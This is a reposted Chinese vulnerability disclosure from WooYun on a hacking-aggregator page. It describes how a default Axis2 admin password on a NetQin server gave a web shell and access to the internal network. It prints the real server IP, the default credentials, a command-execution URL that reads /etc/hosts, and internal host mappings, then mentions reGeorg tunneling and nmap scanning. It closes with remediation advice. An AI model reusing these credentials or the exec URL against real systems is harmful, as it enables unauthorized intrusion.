记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网秦某站弱口令导致的一次内网漫游

2016-06-21 19:15

纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下



http://211.151.59.27:80/axis2/axis2-admin/login



admin:axis2



QQ20160615-2.png





漏洞证明:

getshell



http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts



QQ20160615-1.png





QQ20160615-0.png





通过hosts可以看到是网秦的服务



code 区域
HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014

# HEADER: by puppet. While it can still be managed manually, it

# HEADER: is definitely not recommended.

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1localhost.localdomainlocalhost BJ-YZ-S-ST040

::1localhost6.localdomain6localhost6

127.0.0.1oversea

192.168.3.46bjyz.puppet.nq.com

192.168.0.41a03pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com

192.168.0.217a12app.netqin.com

211.151.59.71a09blyt.netqin.com

192.168.0.143a08i.netqin.com i.nq.com m.nq.com

192.168.5.212a13c.cpsserver.cns

192.168.0.148a05nqses.nq.com

192.168.3.35a11pay.netqin.com pay.nq.com

192.168.3.53a07my.netqin.com

192.168.3.52a06mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com

192.168.5.216a15dbapp.nq.com

192.168.5.207a16dbboss.nq.com

192.168.5.218a14dbuis.nq.com





QQ20160615-3.png





拿到shell了,reGeorg开个代理进内网



namp扫了一下内网网段,内网比较大



设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档



QQ20160615-6.png





QQ20160615-8.png



QQ20160615-10.png



QQ20160615-11.png





QQ20160615-12.png



QQ20160615-13.png



QQ20160615-14.png



QQ20160615-15.png



程序员千行bug率....

QQ20160615-16.png





jenkins 又可以搞下好多机器了

QQ20160615-17.png





QQ20160615-19.png



QQ20160615-20.png



QQ20160615-21.png



QQ20160615-22.png



可申请点卡..

QQ20160615-23.png



QQ20160615-24.png



QQ20160615-26.png



QQ20160615-27.png





不深入测试了

修复方案:

1.修复弱口令

2.删除shell,不排除之前有人进来过

3.加强内网安全

知识来源: www.wooyun.org/bugs/wooyun-2016-0219717

阅读:101464 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“网秦某站弱口令导致的一次内网漫游”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词